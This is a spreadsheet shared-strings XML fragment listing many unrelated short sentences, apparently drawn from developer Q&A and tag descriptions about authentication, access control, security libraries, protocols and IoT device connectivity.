    <t>Publicly shared files do not require a Microsoft account to access.</t>
  </si>
  <si>
    <t>The scalable, secure, multi-tiered, distributed architectureprovides the foundation of an agile ECM framework.</t>
  </si>
  <si>
    <t>As in the project webpage:
CanCanCan is an authorization library for Ruby on Rails which restricts
  what resources a given user is allowed to access.</t>
  </si>
  <si>
    <t>It makes it easy to secure applications and services with little to no code.</t>
  </si>
  <si>
    <t>Instagrams API uses the OAuth 2.0 protocol for simple, but effective authentication and authorization.</t>
  </si>
  <si>
    <t>Use a HealthKit store to request permission to share or read HealthKit data.</t>
  </si>
  <si>
    <t>Apps can check for access to these APIs by calling the hasCarrierPrivileges() method.</t>
  </si>
  <si>
    <t>Apps that call these APIs without access receive a SecurityException.</t>
  </si>
  <si>
    <t>You get your login credentials when you create an account within the service.</t>
  </si>
  <si>
    <t>Other apps can communicate with your app without needing to know whether your app is installed.</t>
  </si>
  <si>
    <t>It is compiled to json which is used by Firebase to secure an app.</t>
  </si>
  <si>
    <t>The UWP provides a guaranteed core API layer across devices.</t>
  </si>
  <si>
    <t>It can also authenticate users with their Cloud Foundry credentials, and can act as an SSO service using those credentials (or others).</t>
  </si>
  <si>
    <t>SSH is the most commonly used protocol for this layer of NETCONF, followed by TLS.</t>
  </si>
  <si>
    <t>A debugging solution for all modern browsers.</t>
  </si>
  <si>
    <t>The user agent mediates
  access to credentials in order to preserve user privacy.</t>
  </si>
  <si>
    <t>or
SELECT * FROM users WHERE username = :username
depending on your platform.</t>
  </si>
  <si>
    <t>IP Encapsulating Security Payload, a protocol designed to provide a mix
of security services in IPv4 and IPv6.</t>
  </si>
  <si>
    <t>Authorization policy is managed separately from an applications code.</t>
  </si>
  <si>
    <t>Therefore the user's privacy must be kept in mind when deploying this header.</t>
  </si>
  <si>
    <t>Ionic Security provides internet scale data protection as a service.</t>
  </si>
  <si>
    <t>A computer network allows sharing of resources and information among interconnected devices.</t>
  </si>
  <si>
    <t>Related tags: privilege, login, authentication, claims-based-identity</t>
  </si>
  <si>
    <t>For example, every web app probably has some
version of Account and User.</t>
  </si>
  <si>
    <t>Example use-cases:
Set up many secure VMs lightning fast.</t>
  </si>
  <si>
    <t>CanCan is an authorization library for Ruby on Rails which restricts what resources a given user is allowed to access.</t>
  </si>
  <si>
    <t>(See SAML claims and assertions)
Authorization is sometimes abbreviated as "AuthZ", while authentication is "AuthN".</t>
  </si>
  <si>
    <t>It also offers multi-master replication, access control, and many extensions.</t>
  </si>
  <si>
    <t>If two objects are stored with the same key, the first one is released, and the last one is stored.</t>
  </si>
  <si>
    <t>kerberos and ntlm are popular single sign-on protocols.</t>
  </si>
  <si>
    <t>Per Apple's email to Developer Center members:
As of June 1, 2012 all apps submitted to the Mac App Store must
  implement sandboxing.</t>
  </si>
  <si>
    <t>Even then, it would have to know the protocol the other devices are speaking to prevent interrupted messages (e.g.</t>
  </si>
  <si>
    <t>Security is a two-step process whose goal is to prevent a user from accessing a resource that they should not have access to.</t>
  </si>
  <si>
    <t>Erubis is a fast, secure, and very extensible implementation of [tag:eruby]</t>
  </si>
  <si>
    <t>With the App ID API, users can log in anonymously or by authenticating with an identity provider.</t>
  </si>
  <si>
    <t>In the UK this meant an update to the Privacy and Electronic Communications Regulations.</t>
  </si>
  <si>
    <t>It can sync files between devices on a local network, or between remote devices over the Internet via secure, distributed P2P technology.</t>
  </si>
  <si>
    <t>I see that my microphone is detected correctly by Windows IOT Core, as i can see the same in the default app which comes with Windows IOT core.</t>
  </si>
  <si>
    <t>Security.framework is an OS X and iOS framework for controlling various cryptographic services, primarily centered around key management.</t>
  </si>
  <si>
    <t>Furthermore, the services registered with the container can use other facilities, such as the logging or transaction management.</t>
  </si>
  <si>
    <t>If the communication is done with more sophisticated communication such as Bluetooth or Wifi and has a protocol, then it may be able to query those sensor details
TL;DR;
Nope, Typically what the Rasberry PI sees the sensor is just a raw analog signal or a digital signal of the data.</t>
  </si>
  <si>
    <t>XACML 3.0 is the eXtensible Access Control Markup Language, an open standard for specifying and evaluating authorization and access control policies.</t>
  </si>
  <si>
    <t>A TrustZone ARM core has two virtual processors with a bus control 'NS' bit to provide hardware based access control.</t>
  </si>
  <si>
    <t>Really, any modern stack driver on a full blown OS isn't going to be capable of low latency because of what else is going on in the system and the need for robustness in the protocols.</t>
  </si>
  <si>
    <t>But we can use some APIs in namespace Windows.Security.Credentials to store and manage your passcodes, passphrases, and other identification information in Windows IoT Core.</t>
  </si>
  <si>
    <t>GlobalPlatform is an association that publishes specifications aiming at standardizing deployment and management of multiple applications on secure chips.</t>
  </si>
  <si>
    <t>The Bitdefender products feature antivirus and antispyware, personal firewall, privacy control, user control and backup for corporate and home users.</t>
  </si>
  <si>
    <t>At the same time, sophisticated audit and approval processes ensure management retain control.</t>
  </si>
  <si>
    <t>Many Java Card products rely on the GlobalPlatform specifications for the secure management of applications on the card (download, installation, personalization, deletion).</t>
  </si>
  <si>
    <t>Crowd is a web-based single sign-on (SSO) tool that aims to simplify application provisioning and identity management.</t>
  </si>
  <si>
    <t>Concurrency
Core Data uses thread (or serialized queue) confinement to protect managed objects and managed object contexts (see Concurrency with Core Data).</t>
  </si>
  <si>
    <t>i tried the change my connection (maybe my company's firewall) but nothing happens too
i would like to fetch data in cosmosDB by stream analytics because next step i want to use powerBI
ComsoDB sample works
and nothing in cosmoDB when i use stream analytics</t>
  </si>
  <si>
    <t>This SDK optionally provides the flexibility for developers to have control over important details, including the handling of private keys needed for client-server communication.</t>
  </si>
  <si>
    <t>It also provides a process for end-users to authorize third-party access to their server resources without sharing their credentials (typically, a username and password pair), using user-agent redirections.</t>
  </si>
  <si>
    <t>Use it for one-off, special-case pages, such as About or Privacy Policy pages, that you want to store in a database but for which you dont want to develop a custom Django application.</t>
  </si>
  <si>
    <t>Since U2F has native support in platforms and browsers, theres no need for drivers or client software
In order to take advantage of the security improvements provided by U2F, you'll need to purchase a hardware key.</t>
  </si>
  <si>
    <t>The project is a framework with pre-defined set of commands, permissions and queries that can be used with various client libraries to easily create applications for desktop and mobile platforms.</t>
  </si>
  <si>
    <t>Rails developers should consider one of the two approaches:
When exposing a Rails time zone identifier externally, use the ActiveSupport::TimeZone::MAPPING constant, which defines a dictionary back to standard IANA/Olson zone identifers.</t>
  </si>
  <si>
    <t>-- Edit for better explanation -- 
The flow i'm looking for is like this:  
1- Mobile phone (iphone or android) is connected to secure home wireless network as usual
2- A new device with wireless interface is powered on first time.</t>
  </si>
  <si>
    <t>We have added proxy configuration URL in IoTedge.service, Docker.service HTTP confidence and IoTedge.service HTTP conf but didn't got any success
Did anyone has experienced this issue.</t>
  </si>
  <si>
    <t>Authorization
The authorization function determines whether a particular entity is authorized to perform a given activity, typically inherited from authentication when logging on to an application or service.</t>
  </si>
  <si>
    <t>NoMachine NX is an enterprise-class solution for secure remote access, hosted virtual desktop deployment, and application delivery built around the self-designed and self-developed NX suite of components.</t>
  </si>
  <si>
    <t>Worse, it forces every single customer of the cluster to upgrade at the same time, regardless of his or her interests; this wastes expensive cycles of customers as they validate the new version of the Hadoop for their applications.</t>
  </si>
  <si>
    <t>We find sacrificing source-level backward compatibility
allows us to increase performance while significantly improving
the security of external-facing cloud services.</t>
  </si>
  <si>
    <t>Communications purporting to be from popular social web sites, auction sites, banks, online payment processors or IT administrators are commonly used to lure unsuspecting public.</t>
  </si>
  <si>
    <t>To change the active account, use the set
subcommand, passing either just a username, if it's unambiguous, or a username
and consumer key pair, like this:
t set active sferik UDfNTpOz5ZDG4a6w7dIWj
Account information is stored in a YAML-formatted file located at ~/.trc.</t>
  </si>
  <si>
    <t>Quoting from Wikipedia:
Digital rights management (DRM) is a class of access control technologies that are used by hardware manufacturers, publishers, copyright holders and individuals with the intent to limit the use of digital content and devices after sale.</t>
  </si>
  <si>
    <t>Third-party service providers offer a higher level interface to Apple API, making it easier to handle notification for a large number of registered devices.</t>
  </si>
  <si>
    <t>Another alternative, as @Paulw11 suggests is to just transmit the UUID, major and minor to mobile devices, and then use this three-part identifier as a key to look up the actual location information in an online database via a web service.</t>
  </si>
  <si>
    <t>You might be able to do something with PoE, but I'm unsure if there are any you could network control.</t>
  </si>
  <si>
    <t>This environment is well suited to and organisation where security and control are paramount.</t>
  </si>
  <si>
    <t>Is it possible to control my IoT device from outside of my private network through Google IoT Cloud services.</t>
  </si>
  <si>
    <t>Digi mesh is actually an extension for XBee series 1 with capability for mesh networking and cannot talk to any other Digi devices (as far as I know).</t>
  </si>
  <si>
    <t>As for your problem, there are multiple solutions to it: One is using  as tokenizer.</t>
  </si>
  <si>
    <t>About the authentication of Azure Container Registry, there are two ways you can choose.</t>
  </si>
  <si>
    <t>And, of course, you can secure your data by putting desirable access controls.</t>
  </si>
  <si>
    <t>It can remotely control either the UI or the internal JavaScript of a Gecko platform, such as Firefox or Firefox OS.</t>
  </si>
  <si>
    <t>I am missing the right authorization though for the 'Access-Control-Allow-Origin'.</t>
  </si>
  <si>
    <t>From there, you can perform secure communication to AWS IoT.</t>
  </si>
  <si>
    <t>If i use VNC and SSH service, can i invoke other programs remotely on pc ?</t>
  </si>
  <si>
    <t>Does anybody know of a solution to this websockets secure issue?</t>
  </si>
  <si>
    <t>Standardization in your design is a big compliance advantage.</t>
  </si>
  <si>
    <t>You should set up HTTPS (self-signed certificate is quite OK for such a service as the only clients to it are under your control).</t>
  </si>
  <si>
    <t>You can now add multiple devices in the Blynk app with each an unique token.</t>
  </si>
  <si>
    <t>Since this device has a dedicated TXDEN pin, those control fields are irrelevant.</t>
  </si>
  <si>
    <t>@dentex
Using Postman:
Fill in tab Auth
Go to tab Headers
Copy 'Authorization' value
Past 'Authorization' value into your code like this:
}</t>
  </si>
  <si>
    <t>The Android device controls what information is shared with the attached device.</t>
  </si>
  <si>
    <t>Authentication is the process of verifying an asserted identity.</t>
  </si>
  <si>
    <t>Designed to protect online privacy</t>
  </si>
  <si>
    <t>It is available both as a hosted solution and as a private virtual appliance running in your network.</t>
  </si>
  <si>
    <t>Single sign-on, a system for sharing authentication credentials between different systems</t>
  </si>
  <si>
    <t>A simple hack could escalate into massive identity theft.</t>
  </si>
  <si>
    <t>Authentication backends
Python Social Auth supports Google, Twitter, Facebook, GitHub, and many other services out of the box.</t>
  </si>
  <si>
    <t>The advantage of running servers on a dedicated computer is security.</t>
  </si>
  <si>
    <t>Further Reading
Role-Based Access Control</t>
  </si>
  <si>
    <t>I want that Pi to be able to connect securely to a web service that is only accessible by the Raspberries that I have.</t>
  </si>
  <si>
    <t>Are there better ways to store sensitive data securely on Raspberry's SD card?</t>
  </si>
  <si>
    <t>So far this combo has worked very well for me, however anyone who downloads the app I have been working on can pair to the BLuno microcontroller, which kind of defeats some of the security implementations put in by the app.</t>
  </si>
  <si>
    <t>Is it secure/fine way or not reading data from a client app.</t>
  </si>
  <si>
    <t>How do Alexa-enabled physical devices authenticate with Alexa Voice Services?</t>
  </si>
  <si>
    <t>However, I cannot even get started with simple online examples because I do not know how to get the element registered for gstreamer to recognize it.</t>
  </si>
  <si>
    <t>Is there any extra code required  for secure websocket compared non-secure?</t>
  </si>
  <si>
    <t>After this I create new device: create new certificate get thumbprint and set this thumbprint to new device.</t>
  </si>
  <si>
    <t>How would I securely migrate this to serverless cloud9 setup running on codestar?</t>
  </si>
  <si>
    <t>I'm trying to create an Identity Translation Gateway as described in here.</t>
  </si>
  <si>
    <t>During device registration process at Watson IoT Platform, I could not find any of these parameters.</t>
  </si>
  <si>
    <t>I am using Mapbox's GL JS library but the geolocation services requires a secure connection to function.</t>
  </si>
  <si>
    <t>I am trying to access an NFS share on a Windows Server 2016 server from a Raspberry Pi running Raspbian using the unprivileged user account 'pi'.</t>
  </si>
  <si>
    <t>I have been using the cloud service to create custom firmware.</t>
  </si>
  <si>
    <t>My main problem is the easiest way to secure the app on the esp board.</t>
  </si>
  <si>
    <t>One thing I like to do is implement port-knocking or something at the network layer in front of the application server.</t>
  </si>
  <si>
    <t>if the information being shared does not require persistence and your data is not highly structured, then you might consider using redis.</t>
  </si>
  <si>
    <t xml:space="preserve">
Secure Shell (SSH) is a network protocol that allows data to be
  exchanged over a secure channel between two computers.</t>
  </si>
  <si>
    <t>Also I don't know how fragile it makes your app if you support only a single cipher.</t>
  </si>
  <si>
    <t>Instead, to identify the metal, I'm using info from the network adaptor(s):
Of course, this is not completely error proof, but, so far, the only way I can see to get a reasonably reliable device ID.</t>
  </si>
  <si>
    <t>try changing Authentication to None in App Properties while deploying/ debugging.</t>
  </si>
  <si>
    <t>If not, got to System Update &amp; security For developers and choose Developer Mode.</t>
  </si>
  <si>
    <t>You just need to register the Azure account, and then click to deploy.</t>
  </si>
  <si>
    <t>The signalling must adhere to a certain protocol for the devices on the bus to recognize it as valid I2C communications.</t>
  </si>
  <si>
    <t>Yes, it can be set pretty slow/fast, but there's no faking ability.</t>
  </si>
  <si>
    <t>PostgreSQL is great, too, but it's usually deployed behind some kind of server-side middleware that handles application-specific authentication and authorization.</t>
  </si>
  <si>
    <t>It's about twice as fast in dp-floatng point tests, faster yet for crypto.</t>
  </si>
  <si>
    <t>The protocol gateway simply performs protocol transation and passes the identity of the device through.</t>
  </si>
  <si>
    <t>What I meant was no simple out-of-the-protocol MQTT security (something like mqtts)
I understand this is not a right statement.</t>
  </si>
  <si>
    <t>Watson IoT Platform security segregates data into organizations that can only be accessed by devices or applications registered to that specific organization.</t>
  </si>
  <si>
    <t>As of now, API Gateway doesn't support insecure HTTP Rest APIs.</t>
  </si>
  <si>
    <t>Note that PackageManager is a restricted capability, so the app won't be able to go into the Store without special permissions from Microsoft.</t>
  </si>
  <si>
    <t>It seems you are trying to access the Device Twins from a "device" (as you are using a SAS Token generated from a Device ID/Key pair) using REST APIs.</t>
  </si>
  <si>
    <t>The Group Key (Group Transient Key) is a shared key among all Supplicants connected to the same AP, and is used to secure multicast/broadcast traffic.</t>
  </si>
  <si>
    <t>Your Traefik service account is missing proper RBAC privileges.</t>
  </si>
  <si>
    <t>If you use Firebase Auth and Nearby you can transfer a token from a phone companion app you can log in as a user on your device.</t>
  </si>
  <si>
    <t>Solution #2 : "The C#-side solution":
Use the ProcessStartInfo-Property "WorkingDirectory" to define your CWD.</t>
  </si>
  <si>
    <t>Otherwise consider investing into a better router, and making sure you get a reliable communication link.</t>
  </si>
  <si>
    <t>-bash: sudo systemctl edit iotedge.service
-Add: 
[Service]
Environment=IOTEDGE_LOG=edgelet=debug
-Restart security Daemon: 
sudo systemctl cat iotedge.service
sudo systemctl daemon-reload
sudo systemctl restart iotedge
How to enable debug logs on Modules (So you can get debug on edgeAgent and EdgeHub): 
On Agent: part of your yaml file configuration on iotedged, replace: 
env: {} by
env:
  RuntimeLogLevel: debug</t>
  </si>
  <si>
    <t>Likewise, IEEE 802.15.4
  devices provide sensing communication-ability in the wireless domain.</t>
  </si>
  <si>
    <t>It's whole goal is a secure receiver go-between for less secure data transmissions.</t>
  </si>
  <si>
    <t>In this sense, it's similar to Ethernet, Firewire or other communication protocols.</t>
  </si>
  <si>
    <t>DBMS_CRYPTO provides an interface to encrypt and decrypt stored data, and can be used in conjunction with PL/SQL programs running network communications.</t>
  </si>
  <si>
    <t>Questions related to the authentication and authorization services for Windows Communication Foundation (WCF) applications</t>
  </si>
  <si>
    <t>Using IAM you can create and manage AWS users and groups and use permissions to allow and deny their permissions to AWS resources</t>
  </si>
  <si>
    <t>Passbook, also known as Wallet, is an application in iOS that allows users to store coupons, boarding passes, and other forms of mobile payment.</t>
  </si>
  <si>
    <t>Third-party websites and applications can now let visitors sign in using their Google user accounts.</t>
  </si>
  <si>
    <t>The ACAccountStore class provides an interface for accessing, manipulating, and storing accounts</t>
  </si>
  <si>
    <t>django-permissions is a pluggable django app that provides per-object permissions for Django based on roles</t>
  </si>
  <si>
    <t>OAuth 2.0 is the second iteration of OAuth, an open authorization standard.</t>
  </si>
  <si>
    <t>Cocoa open-source framework used for transfer that handles FTP, FTP over SSL, SFTP, .mac, WebDAV, secure WebDAV, the file system, S3, and NNTP.</t>
  </si>
  <si>
    <t>The information is stored locally on a users device, and is available even when disconnected and offline.</t>
  </si>
  <si>
    <t>Ember Simple Auth is a lightweight library for implementing authentication/authorization with Ember.js applications.</t>
  </si>
  <si>
    <t>It allows you customize your app identity by configuring certain parameters with a color palette you control.</t>
  </si>
  <si>
    <t>Enable simple payments in your Android app.</t>
  </si>
  <si>
    <t>Active Directory Authentication Library for JavaScript (ADAL JS) helps you to use Azure AD for handling authentication in your single page applications.</t>
  </si>
  <si>
    <t>The client uses the access token to access the protected resources hosted by the resource server.</t>
  </si>
  <si>
    <t>Federated Experience Manager (FXM) allows you to add personalization and tracking to non-Sitecore websites and applications.</t>
  </si>
  <si>
    <t>NetIQ eDirectory (formerly Novell eDirectory) is a full-service, secure LDAP directory.</t>
  </si>
  <si>
    <t>Communications between devices and the cloud happen via the open, lightweight MQTT protocol.</t>
  </si>
  <si>
    <t>The ActivityPub protocol is a decentralized social networking protocol based upon the ActivityStreams 2.0 data format.</t>
  </si>
  <si>
    <t>phpCAS is an authentication library that allows PHP applications to easily authenticate users via a Central Authentication Service (CAS) server.</t>
  </si>
  <si>
    <t>The WildFly Elytron project is a security framework brought to the WildFly application server to provide a single unified security framework.</t>
  </si>
  <si>
    <t>Note: The solutions had previously names of IBM IoT for Insurance, IBM IoT Safer Workplace, and IBM IoT Worker Insights.</t>
  </si>
  <si>
    <t>The WCF Web API project allows WCF developers to expose their APIs via HTTP.</t>
  </si>
  <si>
    <t>A service for authorizing payments for an e-commerce website, an online retailer or a traditional business.</t>
  </si>
  <si>
    <t>Tethering is the act of sharing a data connection in a mobile phone with other computers.</t>
  </si>
  <si>
    <t>It empower developers with all the functionality they need while protecting our users' privacy at the same time.</t>
  </si>
  <si>
    <t>The MCC is the Mobile Country Code and the MNC is the Mobile Network Code which together uniquely identify a mobile network operator.</t>
  </si>
  <si>
    <t>NFC peer-to-peer mode and the NFC Forum Simple NDEF Exchange Protocol (SNEP) are used to initiate the communication.</t>
  </si>
  <si>
    <t>We provide a secure API for easily uploading images to Cloudinary.</t>
  </si>
  <si>
    <t>Identity typically refers to user identity in authentication scenarios.</t>
  </si>
  <si>
    <t>Using IAM you can create and manage AWS users and groups and use permissions to allow and deny their permissions to AWS resources.</t>
  </si>
  <si>
    <t>It has been used by Garlik as their primary RDF platform for three years, and has proved itself to be robust and secure.</t>
  </si>
  <si>
    <t>Passbook, also know as Wallet, is an application in iOS that allows users to store coupons, boarding passes, and other forms of mobile payment.</t>
  </si>
  <si>
    <t>It is built on top of the Yii framework, and thus it is highly reliable.</t>
  </si>
  <si>
    <t>The ACAccountStore class provides an interface for accessing, manipulating, and storing accounts.</t>
  </si>
  <si>
    <t>django-permissions is a pluggable django app that provides per-object permissions for Django based on roles.</t>
  </si>
  <si>
    <t>Roles allow defining what a Drupal user can do by assigning the relevant permissions to a role (e.g.</t>
  </si>
  <si>
    <t>MozApps offers a intelligent communication between the browser and other browsers and servers.</t>
  </si>
  <si>
    <t>Docusign is a service which allows online signatures to be applied to forms.</t>
  </si>
  <si>
    <t>The concept is linked to user-permissions, as a user role is a group of users who share common user permissions.</t>
  </si>
  <si>
    <t>Philosophy
You have data stored somewhere and you want to expose it to your users through a RESTful Web API.</t>
  </si>
  <si>
    <t>Some of your users will only have one password -- for their email account, for their banking account, for your application.</t>
  </si>
  <si>
    <t>It is a JSON file with a name and description for the app, and it can also contain the origin of the app, icons, and the permissions required by the app, among other things.</t>
  </si>
  <si>
    <t>Auth: Verify that a user has a bank account at a certain bank without the need for ACH deposits to verify the account.</t>
  </si>
  <si>
    <t>Netaxept is a solution for various payment methods provided by the Nordic company Nets.</t>
  </si>
  <si>
    <t>Websites built with Hugo are extremely fast and secure.</t>
  </si>
  <si>
    <t>While running, transactions use data resources without acquiring locks on those resources.</t>
  </si>
  <si>
    <t>Security features  cryptography, authentication and authorization, public key infrastructure, and more  are built in.</t>
  </si>
  <si>
    <t>ACS or Security Assertion Markup Language (SAML) is an XML standard that allows secure web domains to exchange user authentication and authorization data.</t>
  </si>
  <si>
    <t>Row-level security is becoming more prevalent with the rise of abac and xacml, technologies that help standardize access control.</t>
  </si>
  <si>
    <t xml:space="preserve"> provides an alternative, "idiot-proof" API for working with secure sockets.</t>
  </si>
  <si>
    <t>If an app needs to use resources or information outside of its own sandbox, the app has to request the appropriate permission.</t>
  </si>
  <si>
    <t>Spring Security is also easy to learn, deploy and manage.</t>
  </si>
  <si>
    <t>Because the default is that resources are denied to users, you typically specify that you will allow users access to resource.</t>
  </si>
  <si>
    <t>Provides access to Facebook login, sharing, graph requests, app events etc.</t>
  </si>
  <si>
    <t>This class also manages identities and tracks changes.</t>
  </si>
  <si>
    <t>In addition you may wish to have an Azure App Insights account so you can capture telemetry from your Bot.</t>
  </si>
  <si>
    <t>Basic Defination
RSA SecurID Access delivers secure and convenient access for any user, from anywhere, to anything.</t>
  </si>
  <si>
    <t>User profiles - A user profile is an entity that is stored and maintained by the service.</t>
  </si>
  <si>
    <t>Software offered includes iRidium studio, iRidium transfer, iRidium Server.</t>
  </si>
  <si>
    <t>IBM Cloud private is an application platform for developing and managing on-premises, containerized applications.</t>
  </si>
  <si>
    <t>There is a Partner Program and a way to unlock the camera, develop apps (called "plug-ins") and customize the functionality of the camera.</t>
  </si>
  <si>
    <t>Description
OAuth is an open standard for authorization.</t>
  </si>
  <si>
    <t>The client then uses the access token to access the protected resources hosted by the resource server.</t>
  </si>
  <si>
    <t>The locks are stored in a filesystem-like hierarchical naming structure.</t>
  </si>
  <si>
    <t>Microsoft Visual Source Safe was the Microsoft solution to source control, up to 2005.</t>
  </si>
  <si>
    <t>RFC 4229), and are commonly understood by all compliant protocol implementations.</t>
  </si>
  <si>
    <t>Keep in mind that using a non AES compatible blocksize/keysize combination can lead to interoperability nightmare and that the security of Rijndael hasn't been widely studied outside of the AES subset.</t>
  </si>
  <si>
    <t>It works by checking a User's access token for any Facebook Page roles.</t>
  </si>
  <si>
    <t>If the User has a role on a Page, and that Page is connected to an Instagram Business Account, the User can grant your app permission to access the connected business account's data.</t>
  </si>
  <si>
    <t>Google Checkout is an online payment processing service offered to people who have a Google Account.</t>
  </si>
  <si>
    <t>crypt12 files are what WhatsApp uses to securely store a user's message databases on his or her Android device.</t>
  </si>
  <si>
    <t>To decrypt a crypt12 to view the message history of the app's user, the key file (which stores the encryption key) must be located.</t>
  </si>
  <si>
    <t>The list of services offered includes messaging, Gram cryptocurrency and many others.</t>
  </si>
  <si>
    <t>Connecting to an untrusted service could give them access to your otherwise secure information.</t>
  </si>
  <si>
    <t xml:space="preserve"> is the managed-code .NET library used to access Microsoft's Active Directory.</t>
  </si>
  <si>
    <t>Unlike barcodes or similar technologies, however, MICR codes can be easily read by humans.</t>
  </si>
  <si>
    <t>It is also possible, to define privacy settings on a per-entry basis for the whole timeline.</t>
  </si>
  <si>
    <t>Public keys are stored as signer certificates while private keys are stored in the personal certificates.</t>
  </si>
  <si>
    <t>Session Initiation Protocol (SIP) is a standard communication protocol.</t>
  </si>
  <si>
    <t>Many mobile phones are equipped with software to offer tethered Internet access.</t>
  </si>
  <si>
    <t>All provisioning profiles store a list of developers allowed to sign the application.</t>
  </si>
  <si>
    <t>It provides user registration, login and connection using social sites credentials.</t>
  </si>
  <si>
    <t>Linked servers offer the following advantages: 
Remote server access.</t>
  </si>
  <si>
    <t>I am using AWS IOT MQTT protocol for realtime update on my web app, I'm getting this certificate error  on Chrome, it's only working on localhost.</t>
  </si>
  <si>
    <t>Somehow ssmtp is not compatible with gmail anymore, even the account has enabled authentication by less secure application.</t>
  </si>
  <si>
    <t>If you have changed the cert then could it be possible to update the identity provider(IDP) with the new cert?.</t>
  </si>
  <si>
    <t>Yes, I agree with that Pattern Identity translation could fit your scenario.</t>
  </si>
  <si>
    <t>The tools can handle login, user registration, user identity storage and other components.</t>
  </si>
  <si>
    <t>Both the BFV and the CKKS scheme are highly performant post-quantum secure RLWE-based homomorphic encryption schemes.</t>
  </si>
  <si>
    <t>I'd like to leverage as many modules in Azure as I can as this POC may turn into a device management solution with provisioning, authentication, reporting, etc.</t>
  </si>
  <si>
    <t>A simple user management script written in PHP/MySQL which allows you to easily add login protected areas of you website.</t>
  </si>
  <si>
    <t>Quoting the Developer.Apple page:
Symbolication - resolving backtrace addresses to source code methods and lines.</t>
  </si>
  <si>
    <t>Mojo is an effort to extract a common platform out of Chrome's renderer and plugin processes that can support multiple types of sandboxed content, such as HTML, Pepper, or NaCl.</t>
  </si>
  <si>
    <t>Providers implementing ExceptionMapper contract must be either programmatically registered in a JAX-RS runtime or must be annotated with @Provider annotation to be automatically discovered by the JAX-RS runtime during a provider scanning phase.</t>
  </si>
  <si>
    <t>Transmission Control Protocol (TCP) is a transport layer protocol that provides a connection-oriented data stream service with guaranteed, in-order delivery on top of the underlying packet-oriented, unreliable IP layer.</t>
  </si>
  <si>
    <t>Instead of directly using the complex OpenSSL-compatible API underlying LibreSSL, libtls provides a much simpler API that comes with sane defaults and dramatically cuts down on the number of decisions developers have to make to create a secure connection.</t>
  </si>
  <si>
    <t>Other possible response codes include:
102 (Subscriber not found)
103 (Account barred from refill)
104 (Temporary blocked)
117 (Service class change not allowed)
124 (Below minimum balance)
155 (Invalid new service class)</t>
  </si>
  <si>
    <t>Lazy registration is a process that allows the prospective user to test out many of the core features, save their sessions and data, and then when they are ready to sign up, everything is ported to their "new" account.</t>
  </si>
  <si>
    <t>Cloudflare is a content delivery network and distributed Domain Name Server service aimed at enhancing website performance and speed and providing security.</t>
  </si>
  <si>
    <t>oneM2M is a global organization that creates requirements, architecture, API specifications, security solutions and interoperability for Machine-to-Machine and IoT technologies.</t>
  </si>
  <si>
    <t>Steeltoe provides libraries for service discovery, circuit breaker, external configuration servers, connectors for connecting to services, security, logging, application management, application health monitoring, distributed tracing, and more.</t>
  </si>
  <si>
    <t>SimpleUsers is a simple user management script written in PHP/MySQL which allows you to easily add login protected areas of you website.</t>
  </si>
  <si>
    <t>XACML is the eXtensible Access Control Markup Language, an open standard for specifying and evaluating authorization and access control policies.</t>
  </si>
  <si>
    <t>Device public keys that are not signed by the registry-level certificates are rejected by Cloud IoT Core.</t>
  </si>
  <si>
    <t>hubiC is a storage service proposed by OVH, which is accessible via the internet, through which the users can share data within their private domain.</t>
  </si>
  <si>
    <t>Code used in version control systems can be marked with some tags like $Id$ and $author$ to provide meta data in the files under version control.</t>
  </si>
  <si>
    <t>Via NX, accessing remote desktops, servers and applications, whatever their location, is just as fast, easy and secure as if you were sitting in front of them.</t>
  </si>
  <si>
    <t>In so doing, it greatly reduces the amount of work and validation that the driver must perform, thus drastically reducing driver complexity.</t>
  </si>
  <si>
    <t>cashU is built on and around sophisticated, up-to-date fraud prevention and AML systems, reducing the risks associated with online payments for both buyers and sellers.</t>
  </si>
  <si>
    <t>XACML is the eXtensible Access Control Markup Language, an open standard for specifying and evaluating of authorization and access control policies.</t>
  </si>
  <si>
    <t>If it is compliant or partly compatible, the Wi-Fi Alliance may not object to its description as a Wi-Fi device though technically only the CERTIFIED designation carries their approval.</t>
  </si>
  <si>
    <t>I have several raspberry pi devices, and I want to link them to one web application securely with ssl in public key infrastructure.</t>
  </si>
  <si>
    <t>I'm using dnsdynamic.org which offers this url for really simple IP updates
https://username:password@www.dnsdynamic.org/api/?hostname=techno.ns360.info&amp;myip=127.0.0.1
This works great from a browser, but arduino cannot use SSL.</t>
  </si>
  <si>
    <t>So my question stands is, without user consent, can we use Google Service Accounts to authenticate with Google Cloud Storage?</t>
  </si>
  <si>
    <t>Support for TLS / SSL
Secure your socket with ease using just a single method call.</t>
  </si>
  <si>
    <t xml:space="preserve"> is an OS X and iOS framework for controlling various cryptographic services, primarily centered around key management.</t>
  </si>
  <si>
    <t>To install on iOS devices, you must first register the device with your Apple developer account and add it to a provisioning profile.</t>
  </si>
  <si>
    <t>One personal reason is, I want a group of raspberry pi to share the same key if they want to connect to one particular service.</t>
  </si>
  <si>
    <t>My current goal is to create an app with just 3 buttons: a button to connect to the Bluetooth module (HC-06), a button to unlock the door and a button to lock the door.</t>
  </si>
  <si>
    <t>The code will run without error for a few days after I log-in and use the captcha account authentication, and toggle 'allow less secure apps access' button, but I need something that I can set and forget.</t>
  </si>
  <si>
    <t>Don't worry data sent through this protocol doesn't need to be secure, but the transceivers have built in encryption (in case).</t>
  </si>
  <si>
    <t>The code I am using is:
When I configure the Package.appxmanifest with:
and compile the application I get the error:
Error       DEP0700 : Registration of the app failed.</t>
  </si>
  <si>
    <t>Do I needed to use any APP to make mobile as slave which can be detected by the CC41a master?</t>
  </si>
  <si>
    <t>My question is geared towards how to effectively combine these services so that each user can access several of his or her devices securely.</t>
  </si>
  <si>
    <t>I'm  using a normal JWT token from a standard identity provider (Keycloak), so there's not really much I can do to shorten it.</t>
  </si>
  <si>
    <t>I took the reference implementation to get a secure TCP connection between a simple Python implemented server and the ESP8266 board as a client.</t>
  </si>
  <si>
    <t>I'm wondering if there's a way for the secure daemon to encrypt generic blobs of data for us using the TPM, or if we are expected to try to communicate with the TPM from inside the container somehow to do this?</t>
  </si>
  <si>
    <t>Now I want to create an app to connect to that database with a help of a virtual private server on a cloud
network.</t>
  </si>
  <si>
    <t>This makes me think I'm messing something up with the registration, or that I'm missing some component, like a subscribe or link with that voip.ms account.</t>
  </si>
  <si>
    <t>My requirement is to develop a mobile app which itself register the mobile device in an IoT hub using provisioning services.</t>
  </si>
  <si>
    <t>Any ideas to protect these services and/or the code that is in the raspberry pi and add more security to this infrastructure?</t>
  </si>
  <si>
    <t>If not then, how other professional smart devices are configured to be scanned and connect with their own mobile App..?</t>
  </si>
  <si>
    <t>When a device sends a registration message to MQTT broker, I have a rule to store it in a SQS queue.</t>
  </si>
  <si>
